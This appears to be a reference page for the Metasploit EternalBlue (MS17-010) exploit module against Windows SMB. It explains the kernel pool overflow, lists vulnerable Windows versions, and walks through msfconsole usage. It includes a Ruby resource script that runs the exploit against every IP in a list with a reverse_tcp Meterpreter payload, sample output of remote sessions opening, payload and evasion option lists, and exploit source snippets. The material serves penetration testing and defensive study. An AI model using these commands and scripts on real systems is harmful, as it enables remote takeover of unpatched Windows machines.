MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption - Metasploit


This page contains detailed information about how to use the exploit/windows/smb/ms17_010_eternalblue metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Module: exploit/windows/smb/ms17_010_eternalblue
Source code: modules/exploits/windows/smb/ms17_010_eternalblue.rb
Disclosure date: 2017-03-14
Last modification time: 2021-06-29 16:18:28 +0000
Supported architecture(s): x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): 445
List of CVEs: CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148

This module is also known as ETERNALBLUE.

This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.

Module Ranking and Traits


Module Ranking:

  • average: The exploit is generally unreliable or difficult to exploit. More information about ranking can be found here.

Basic Usage


Using ms17_010_eternalblue against a single host

Normally, you can use exploit/windows/smb/ms17_010_eternalblue this way:

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show targets
    ... a list of targets ...
msf exploit(ms17_010_eternalblue) > set TARGET target-id
msf exploit(ms17_010_eternalblue) > show options
    ... show and set options ...
msf exploit(ms17_010_eternalblue) > exploit

Using ms17_010_eternalblue against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your ms17_010_eternalblue will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/windows/smb/ms17_010_eternalblue")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • CheckModule: Module to check with

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


ms17_010_eternalblue is a remote exploit against Microsoft Windows, originally written by the Equation Group (NSA) and leaked by Shadow Brokers (an unknown hacking entity). It is considered a reliable exploit and allows you to gain access not only as SYSTEM - the highest Windows user mode privilege, but also full control of the kernel in ring 0. In modern day penetration tests, this exploit can be used in internal and external environments.

As far as remote kernel exploits go, this one is highly reliable and safe to use.

The check command of ms17_010_eternalblue is also highly accurate, because Microsoft's patch inadvertently added an information disclosure with extra checks on vulnerable code paths.

Vulnerable Application


This exploit works against a vulnerable SMB service from one of these Windows systems:

  • Windows XP x86 (All Service Packs)
  • Windows 2003 x86 (All Service Packs)
  • Windows 7 x86 (All Service Packs)
  • Windows 7 x64 (All Service Packs)
  • Windows 2008 R2 x64 (All Service Packs)
  • Windows 8.1 x64
  • Windows Server 2012 R2 x64
  • Windows 10 Pro x64 (< Version 1507)
  • Windows 10 Enterprise Evaluation x64 (< Version 1507)

To reliability determine whether the machine is vulnerable, you will have to either examine the system's patch level, or use a vulnerability check.

Verification Steps


  • [x] Start msfconsole
  • [x] use exploit/windows/smb/ms17_010_eternalblue
  • [x] set RHOST to Windows 7/2008 x64
  • [x] set PAYLOAD
  • [x] exploit
  • [x] Verify that you get a shell
  • [x] Verify that you do not crash (post an Issue with core dump if you do)

Options


set ProcessName [string]

This is the usermode process that an APC containing shellcode will be queued into. This should probably be a SYSTEM process, such as lsass.exe or spoolsv.exe.

set GroomAllocations [integer]

This is the base number of pool grooming packets that will be sent per exploit.

set MaxExploitAttempts [integer]

Grooming the kernel pool does not always succeed, so this is the amount of times to retry the exploit. Only used when exploiting machines with Windows XP x86, Windows 2003 x86, Windows 7 x86, Windows 7 x64, or Windows 2008 R2 x64.

set GroomDelta [integer]

This is the number of extra kernel pool grooming attempts that will be performed per exploit try, if previous try failed. Only used when exploiting machines with Windows XP x86, Windows 2003 x86, Windows 7 x86, Windows 7 x64, or Windows 2008 R2 x64.

Unsafe configuration of Target It is not possible to determine the Architecture (x86 or x64) of a machine from its SMB headers. The exploit has safeguards to silently fail if you use the wrong arch. If the shells aren't poppin', try to change the architecture.

Go back to menu.

Msfconsole Usage


Here is how the windows/smb/ms17_010_eternalblue exploit module looks in the msfconsole:

msf6 > use exploit/windows/smb/ms17_010_eternalblue

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show info

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Equation Group
  Shadow Brokers
  sleepya
  Sean Dillon <[email protected]>
  Dylan Davis <[email protected]>
  thelightcosine
  wvu <[email protected]>
  agalway-r7
  cdelafuente-r7
  cdelafuente-r7
  agalway-r7

Available targets:
  Id  Name
  --  ----
  0   Automatic Target
  1   Windows 7
  2   Windows Embedded Standard 7
  3   Windows Server 2008 R2
  4   Windows 8
  5   Windows 8.1
  6   Windows Server 2012
  7   Windows 10 Pro
  8   Windows 10 Enterprise Evaluation

Check supported:
  Yes

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT          445              yes       The target port (TCP)
  SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
  SMBPass                         no        (Optional) The password for the specified username
  SMBUser                         no        (Optional) The username to authenticate as
  VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
  VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload information:
  Space: 2000

Description:
  This module is a port of the Equation Group ETERNALBLUE exploit, 
  part of the FuzzBunch toolkit released by Shadow Brokers. There is a 
  buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is 
  calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error 
  where a DWORD is subtracted into a WORD. The kernel pool is groomed 
  so that overflow is well laid-out to overwrite an SMBv1 buffer. 
  Actual RIP hijack is later completed in 
  srvnet!SrvNetWskReceiveComplete. This exploit, like the original may 
  not trigger 100% of the time, and should be run continuously until 
  triggered. It seems like the pool will get hot streaks and need a 
  cool down period before the shells rain in again. The module will 
  attempt to use Anonymous login, by default, to authenticate to 
  perform the exploit. If the user supplies credentials in the 
  SMBUser, SMBPass, and SMBDomain options it will use those instead. 
  On some systems, this module may cause system instability and 
  crashes, such as a BSOD or a reboot. This may be more likely with 
  some payloads.

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://nvd.nist.gov/vuln/detail/CVE-2017-0143
  https://nvd.nist.gov/vuln/detail/CVE-2017-0144
  https://nvd.nist.gov/vuln/detail/CVE-2017-0145
  https://nvd.nist.gov/vuln/detail/CVE-2017-0146
  https://nvd.nist.gov/vuln/detail/CVE-2017-0147
  https://nvd.nist.gov/vuln/detail/CVE-2017-0148
  https://github.com/RiskSense-Ops/MS17-010
  https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf
  https://www.exploit-db.com/exploits/42030

Also known as:
  ETERNALBLUE

Module Options


This is a complete list of options available in the windows/smb/ms17_010_eternalblue exploit:

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Advanced Options


Here is a complete list of advanced options supported by the windows/smb/ms17_010_eternalblue exploit:

msf6 exploit(windows/smb/ms17_010_eternalblue) > show advanced

Module advanced options (exploit/windows/smb/ms17_010_eternalblue):

   Name                    Current Setting                     Required  Description
   ----                    ---------------                     --------  -----------
   CHOST                                                       no        The local client address
   CPORT                                                       no        The local client port
   CheckModule             auxiliary/scanner/smb/smb_ms17_010  yes       Module to check with
   ConnectTimeout          10                                  yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                                      no        The information file that contains context information
   DisablePayloadHandler   false                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                               no        Use transient context when encoding payloads
   GroomAllocations        12                                  yes       Initial number of times to groom the kernel pool.
   GroomDelta              5                                   yes       The amount to increase the groom count by per try. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   MaxExploitAttempts      3                                   yes       The number of times to retry the exploit. Useful as EternalBlue can sometimes require multiple attempts to get a successful execution.
   ProcessName             spoolsv.exe                         yes       Process to inject payload into.
   Proxies                                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false                               no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                                   no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER                                no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false                               no        Enable detailed status messages
   WORKSPACE                                                   no        Specify the workspace for this module
   WfsDelay                5                                   no        Additional delay in seconds to wait for a session

Payload advanced options (windows/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/smb/ms17_010_eternalblue module can exploit:

msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Target
   1   Windows 7
   2   Windows Embedded Standard 7
   3   Windows Server 2008 R2
   4   Windows 8
   5   Windows 8.1
   6   Windows Server 2012
   7   Windows 10 Pro
   8   Windows 10 Enterprise Evaluation

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/smb/ms17_010_eternalblue exploit:

msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads

Compatible Payloads
===================

   #   Name                                                Disclosure Date  Rank    Check  Description
   -   ----                                                ---------------  ----    -----  -----------
   0   payload/generic/custom                                               normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                       normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                                    normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/windows/x64/exec                                             normal  No     Windows x64 Execute Command
   4   payload/windows/x64/loadlibrary                                      normal  No     Windows x64 LoadLibrary Path
   5   payload/windows/x64/messagebox                                       normal  No     Windows MessageBox x64
   6   payload/windows/x64/meterpreter/bind_ipv6_tcp                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   7   payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   8   payload/windows/x64/meterpreter/bind_named_pipe                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   9   payload/windows/x64/meterpreter/bind_tcp                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   10  payload/windows/x64/meterpreter/bind_tcp_rc4                         normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   11  payload/windows/x64/meterpreter/bind_tcp_uuid                        normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   12  payload/windows/x64/meterpreter/reverse_http                         normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   13  payload/windows/x64/meterpreter/reverse_https                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   14  payload/windows/x64/meterpreter/reverse_named_pipe                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   15  payload/windows/x64/meterpreter/reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   16  payload/windows/x64/meterpreter/reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   17  payload/windows/x64/meterpreter/reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   18  payload/windows/x64/meterpreter/reverse_winhttp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   19  payload/windows/x64/meterpreter/reverse_winhttps                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
   20  payload/windows/x64/peinject/bind_ipv6_tcp                           normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
   21  payload/windows/x64/peinject/bind_ipv6_tcp_uuid                      normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
   22  payload/windows/x64/peinject/bind_named_pipe                         normal  No     Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
   23  payload/windows/x64/peinject/bind_tcp                                normal  No     Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
   24  payload/windows/x64/peinject/bind_tcp_rc4                            normal  No     Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   25  payload/windows/x64/peinject/bind_tcp_uuid                           normal  No     Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
   26  payload/windows/x64/peinject/reverse_named_pipe                      normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
   27  payload/windows/x64/peinject/reverse_tcp                             normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
   28  payload/windows/x64/peinject/reverse_tcp_rc4                         normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   29  payload/windows/x64/peinject/reverse_tcp_uuid                        normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
   30  payload/windows/x64/pingback_reverse_tcp                             normal  No     Windows x64 Pingback, Reverse TCP Inline
   31  payload/windows/x64/powershell_bind_tcp                              normal  No     Windows Interactive Powershell Session, Bind TCP
   32  payload/windows/x64/powershell_reverse_tcp                           normal  No     Windows Interactive Powershell Session, Reverse TCP
   33  payload/windows/x64/shell/bind_ipv6_tcp                              normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   34  payload/windows/x64/shell/bind_ipv6_tcp_uuid                         normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   35  payload/windows/x64/shell/bind_named_pipe                            normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   36  payload/windows/x64/shell/bind_tcp                                   normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager
   37  payload/windows/x64/shell/bind_tcp_rc4                               normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   38  payload/windows/x64/shell/bind_tcp_uuid                              normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   39  payload/windows/x64/shell/reverse_tcp                                normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   40  payload/windows/x64/shell/reverse_tcp_rc4                            normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   41  payload/windows/x64/shell/reverse_tcp_uuid                           normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   42  payload/windows/x64/shell_bind_tcp                                   normal  No     Windows x64 Command Shell, Bind TCP Inline
   43  payload/windows/x64/shell_reverse_tcp                                normal  No     Windows x64 Command Shell, Reverse TCP Inline
   44  payload/windows/x64/vncinject/bind_ipv6_tcp                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   45  payload/windows/x64/vncinject/bind_ipv6_tcp_uuid                     normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   46  payload/windows/x64/vncinject/bind_named_pipe                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
   47  payload/windows/x64/vncinject/bind_tcp                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   48  payload/windows/x64/vncinject/bind_tcp_rc4                           normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   49  payload/windows/x64/vncinject/bind_tcp_uuid                          normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   50  payload/windows/x64/vncinject/reverse_http                           normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   51  payload/windows/x64/vncinject/reverse_https                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   52  payload/windows/x64/vncinject/reverse_tcp                            normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   53  payload/windows/x64/vncinject/reverse_tcp_rc4                        normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   54  payload/windows/x64/vncinject/reverse_tcp_uuid                       normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   55  payload/windows/x64/vncinject/reverse_winhttp                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   56  payload/windows/x64/vncinject/reverse_winhttps                       normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)

Evasion Options


Here is the full list of possible evasion options supported by the windows/smb/ms17_010_eternalblue exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/smb/ms17_010_eternalblue) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

The target is not vulnerable.


Here is a relevant code snippet related to the "The target is not vulnerable." error message:

276:	    check_code = check
277:	
278:	    if check_code.code == 'vulnerable'
279:	      print_good('The target is vulnerable.')
280:	    else
281:	      print_bad('The target is not vulnerable.')
282:	    end
283:	
284:	    if check_code.details[:arch] == ARCH_X86
285:	      fail_with(Failure::NoTarget, 'This module only supports x64 (64-bit) targets')
286:	    end

This module only supports x64 (64-bit) targets


Here is a relevant code snippet related to the "This module only supports x64 (64-bit) targets" error message:

280:	    else
281:	      print_bad('The target is not vulnerable.')
282:	    end
283:	
284:	    if check_code.details[:arch] == ARCH_X86
285:	      fail_with(Failure::NoTarget, 'This module only supports x64 (64-bit) targets')
286:	    end
287:	
288:	    if datastore['ForceExploit'] == 'true' || check_code.code == 'vulnerable'
289:	      print_status('Forcing Exploit') if datastore['ForceExploit'] == 'true'
290:	

Error with login: <RESPONSE_CODE>


Here is a relevant code snippet related to the "Error with login: <RESPONSE_CODE>" error message:

398:	        response_code = client.login(ntlm_flags: NTLM_FLAGS,
399:	                                     session_setup_packet: session_setup_packet,
400:	                                     session_setup_auth_packet: session_setup_auth_packet)
401:	
402:	        unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS
403:	          raise RubySMB::Error::UnexpectedStatusCode, "Error with login: #{response_code}"
404:	        end
405:	
406:	        tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")
407:	      end
408:	

Could not make SMBv1 connection. <E.CLASS> error raised with message '<E.MESSAGE>'


Here is a relevant code snippet related to the "Could not make SMBv1 connection. <E.CLASS> error raised with message '<E.MESSAGE>'" error message:

406:	        tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")
407:	      end
408:	
409:	      return client, tree, sock
410:	    rescue StandardError => e
411:	      print_error("Could not make SMBv1 connection. #{e.class} error raised with message '#{e.message}'")
412:	      elog('Could not make SMBv1 connection', error: e)
413:	
414:	      # for an as of yet undetermined reason, a connection can sometimes be created after an error during an anonymous
415:	      # login.
416:	      if client

Could not make SMBv1 connection


Here is a relevant code snippet related to the "Could not make SMBv1 connection" error message:

407:	      end
408:	
409:	      return client, tree, sock
410:	    rescue StandardError => e
411:	      print_error("Could not make SMBv1 connection. #{e.class} error raised with message '#{e.message}'")
412:	      elog('Could not make SMBv1 connection', error: e)
413:	
414:	      # for an as of yet undetermined reason, a connection can sometimes be created after an error during an anonymous
415:	      # login.
416:	      if client
417:	        client.disconnect!

CommunicationError encountered. Have you set SMBUser/SMBPass?


Here is a relevant code snippet related to the "CommunicationError encountered. Have you set SMBUser/SMBPass?" error message:

540:	    pkt.smb_header.flags2.extended_security = 1
541:	
542:	    begin
543:	      recv_pkt = RubySMB::SMB1::Packet::NtTrans::Response.read(conn.send_recv(pkt))
544:	    rescue RubySMB::Error::CommunicationError => e
545:	      print_status('CommunicationError encountered. Have you set SMBUser/SMBPass?')
546:	      raise e
547:	    end
548:	
549:	    if recv_pkt.status_code.value == 0
550:	      print_good('got good NT Trans response')

got bad NT Trans response: <RECV_PKT.STATUS_CODE.NAME>n<RECV_PKT.STATUS_CODE.DESCRIPTION>


Here is a relevant code snippet related to the "got bad NT Trans response: <RECV_PKT.STATUS_CODE.NAME>n<RECV_PKT.STATUS_CODE.DESCRIPTION>" error message:

547:	    end
548:	
549:	    if recv_pkt.status_code.value == 0
550:	      print_good('got good NT Trans response')
551:	    else
552:	      print_error("got bad NT Trans response: #{recv_pkt.status_code.name}\n#{recv_pkt.status_code.description}")
553:	      return nil
554:	    end
555:	
556:	    # Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data
557:	    size_of_data_to_be_sent = first_data_fragment_size

This exploit does not support this build


Here is a relevant code snippet related to the "This exploit does not support this build" error message:

581:	    print_status("Target OS: #{os}")
582:	
583:	    if os.start_with?('Windows 10')
584:	      build = os.split.last.to_i
585:	      if build >= 14393 # version 1607
586:	        print_status('This exploit does not support this build')
587:	        return
588:	      end
589:	    elsif !(os.start_with?('Windows 8') || os.start_with?('Windows Server 2012'))
590:	      print_status('This exploit does not support this target:')
591:	      return

This exploit does not support this target


Here is a relevant code snippet related to the "This exploit does not support this target" error message:

585:	      if build >= 14393 # version 1607
586:	        print_status('This exploit does not support this build')
587:	        return
588:	      end
589:	    elsif !(os.start_with?('Windows 8') || os.start_with?('Windows Server 2012'))
590:	      print_status('This exploit does not support this target:')
591:	      return
592:	    end
593:	
594:	    # The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.
595:	    # Send TRANS2_OPEN2 (0) with special fea_list to a target exce

bad response status for nx: <RECV_PKT.STATUS_CODE.VALUE>


Here is a relevant code snippet related to the "bad response status for nx: <RECV_PKT.STATUS_CODE.VALUE>" error message:

654:	
655:	    recv_pkt = RubySMB::SMB1::Packet::Trans2::Response.read(nx_conn.recv_packet)
656:	    if recv_pkt.status_code.value == 0xc000000d
657:	      print_good('good response status for nx: INVALID_PARAMETER')
658:	    else
659:	      print_error("bad response status for nx: #{recv_pkt.status_code.value}")
660:	    end
661:	
662:	    # one of srvnet_conn struct header should be modified
663:	    # send '\x00' to disable nx
664:	    srvnet_conn.each { |sk| sk.send("\x00", 0) }

